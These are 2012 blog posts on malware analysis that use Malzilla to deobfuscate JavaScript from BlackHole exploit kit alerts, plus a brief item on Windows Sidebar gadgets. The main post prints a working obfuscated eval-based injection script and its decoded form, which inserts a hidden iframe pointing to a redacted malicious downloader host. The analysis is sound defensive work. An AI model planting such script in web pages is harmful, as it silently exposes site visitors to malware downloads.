Tuesday, July 31, 2012

Malzilla Take Two

Malzilla is a really good tool to have in your intrusion analyst's toolbox. Lately I've been seeing a number of BlackHole alerts, most of which use an obfuscation method that looks like this:


try{1-prototype;}catch(asd){x=2;} if(x){f=[0,-1,94,93,22,29,91,101,88,108,99,90,101,106,35,94,91,105,60,98,90,100,91,99,107,105,55,112,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,37,84,31,112,4,-1,-2,0,95,91,105,87,98,92,104,29,32,49,2,0,-1,114,23,91,97,106,91,21,114,3,-2,0,-1,89,102,89,106,100,91,99,107,36,108,105,95,105,92,30,23,51,95,91,105,87,98,92,22,104,105,89,50,30,94,105,107,102,47,38,37,94,98,89,87,101,93,101,112,36,98,105,88,86,106,95,88,37,89,100,100,37,52,94,101,50,41,29,21,110,95,89,107,94,50,30,39,37,30,22,93,92,95,92,95,106,50,30,39,37,30,22,104,107,111,97,92,51,28,109,95,104,96,88,94,99,95,105,112,48,93,96,90,89,92,100,48,103,101,104,96,106,94,102,100,47,88,88,104,102,98,106,107,91,48,99,91,91,107,48,37,50,106,100,103,48,37,50,29,51,51,37,94,93,104,86,100,91,51,25,31,48,4,-1,-2,116,3,-2,0,92,106,101,89,105,96,101,99,23,95,91,105,87,98,92,104,29,32,113,2,0,-1,-2,109,87,103,23,92,21,52,22,89,102,89,106,100,91,99,107,36,88,105,91,86,107,91,58,99,91,98,92,100,105,31,29,94,93,104,86,100,91,28,32,49,91,37,105,90,107,55,105,107,104,94,89,107,105,92,30,28,106,104,88,30,34,28,95,106,105,103,48,36,38,95,96,90,88,99,94,102,110,37,99,103,89,87,104,96,89,35,90,101,98,38,53,92,102,51,39,30,31,48,93,36,104,107,111,97,92,36,107,96,105,94,89,95,97,96,106,110,52,29,93,96,90,89,92,100,28,50,92,35,106,106,110,99,91,35,103,101,104,96,106,94,102,100,50,30,87,87,106,101,97,108,106,90,30,49,91,37,105,105,112,98,90,37,98,90,93,106,50,30,38,28,50,92,35,106,106,110,99,91,35,107,101,101,52,29,37,30,49,91,37,105,90,107,55,105,107,104,94,89,107,105,92,30,28,110,95,89,107,94,28,35,29,38,39,29,30,50,92,35,106,91,105,56,106,105,105,95,87,108,106,90,31,29,93,92,95,92,95,106,28,35,29,38,39,29,30,50,3,-2,0,-1,89,102,89,106,100,91,99,107,36,92,92,106,58,99,91,98,92,100,105,106,56,110,75,87,92,69,87,98,92,30,28,89,101,89,112,29,30,82,38,82,37,87,101,103,91,99,91,57,93,96,98,89,31,92,30,50,3,-2,0,115];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Co"+"de":"");zx=((e)?"fromChar":"")+z;for(i=0;575-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));} if(x&&f&&012===10)e(s);

Deobfuscating this by hand isn't much fun if you're not a JavaScript programmer. Fortunately, getting the clear text result of this block of code is as easy as copying and pasting it into Malzilla's  Decoder tab (or putting the URL into the Download tab). Malzilla will prompt you to save the downloaded script into a text file for evaluation, if you use the second method. But if your IDS has already captured the data content, the Decoder function will work fine.

Here's the result:


if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("");
}
function iframer(){
var f = document.createElement('iframe');f.setAttribute('src','http://(redacted).com/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);

We can now see the code was a hidden iframe, pointing to a malicious downloader site, which fortunately is no longer up.

The secondary benefit of this is as a teaching tool. If you don't speak JavaScript, you can look at the obfuscated code block and the decoded result and begin to learn how the methods are working. Well, maybe.

Wednesday, July 25, 2012

JavaScript unescape obfuscated code


A quick way to decode SOME simple obfuscation of Javascript is to use the Malzilla tool, found at http://malzilla.sourceforge.net/downloads.html

Malzilla can take a string, like this one found in an “INDICATOR-OBFUSCATION Potential obfuscated javascript eval unescape attack attempt” alert, and deobfuscate it, while replacing eval with evla, to prevent the script from running (to be safer, you should run this on a virtual machine with no networking or on a test box)

eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%20%68%72%65%66%3d%22%6d%61%69%6c%74%6f%3a%69%64%62%40%62%61%63%6b%62%65%61%74%6d%65%64%69%61%2e%63%6f%6d%3f%73%75%62%6a%65%63%74%3d%69%44%6f%77%6e%6c%6f%61%64%42%6c%6f%67%25%32%30%41%64%76%65%72%74%69%73%69%6e%67%25%32%30%49%6e%66%6f%25%32%30%52%65%71%75%65%73%74%22%3e%41%64%76%65%72%74%69%73%65%3c%2f%61%3e%27%29%3b'))

Make sure when you copy this from the content data into the Decoder tab, your parenthesis match up. Once run through the tool (make sure you leave the “Replace eval with evla option enabled”), this decodes to:


This one wasn't malicious, but we didn't know that until we deobfuscated it. 

Thursday, July 12, 2012

Windows Sidebar


Sophos is reporting that the Windows Sidebar and it's Gadgets have been found to be an attack vector from malicious code (not exactly an unthought-of of concept) and has released a “Fix It” tool, not a patch. The tool simply disables the Sidebar, and in Windows 8 it will no longer exist. 
Sophos' blog post about his can be found here.

Blog Archive